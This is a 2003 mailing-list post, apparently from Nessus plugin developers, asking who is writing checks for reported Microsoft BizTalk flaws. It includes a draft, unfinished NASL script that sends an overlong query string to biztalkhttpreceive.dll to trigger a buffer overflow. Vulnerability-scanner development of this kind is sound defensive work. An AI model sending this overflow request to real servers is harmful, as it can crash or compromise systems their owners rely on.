Anyone working on Cesar's biztalk bugs

From: John Lampe (j_lampeat_private)
Date: Thu May 15 2003 - 22:04:07 PDT

Previous message: John Lampe: "more biztalk shtuff"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Is anyone working on Cesar's biztalk bugs?  According to his bugtraq post,
the following should overflow a vulnerable biztalk server....Does anyone
have a biztalk server to test against?

req = string("POST /Site/biztalkhttpreceive.dll?",crap(250),"
HTTP/1.0\r\n");
req = req + string("Accept: */*", "\r\n", "User-Agent: Mozilla/4.0
(compatible; MSIE 6.0; Windows", "\r\n");
req = req + string("NT 5.0; .NET CLR 1.0.3705)", "\r\n", "Host: ",
get_host_ip(), "\r\n");
req = req + string("Content-Length: 6", "\r\n", "Proxy-Connection:
Keep-Alive", "\r\n", "Pragma: no-cache", "\r\n\r\n");
req = req + string("NESSUS\r\n\r\n");

port = 80;
soc = open_sock_tcp(port);
if (soc) {
q = send(socket:soc, data:req);
r = recv(socket:soc, length:2048);
#display(r);

if (egrep(pattern:".*something_or_other*", string:r) )
 security_hole(port:port);}

}

He also showed some vulnerable scripts (sql injection) which would be really
simple to write.  A "grep -i biztalk /usr/local/lib/nessus/plugins/*.nasl"
reveals nothing....


John W. Lampe
https://f00dikator.aceryder.com/

Previous message: John Lampe: "more biztalk shtuff"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu May 15 2003 - 21:58:05 PDT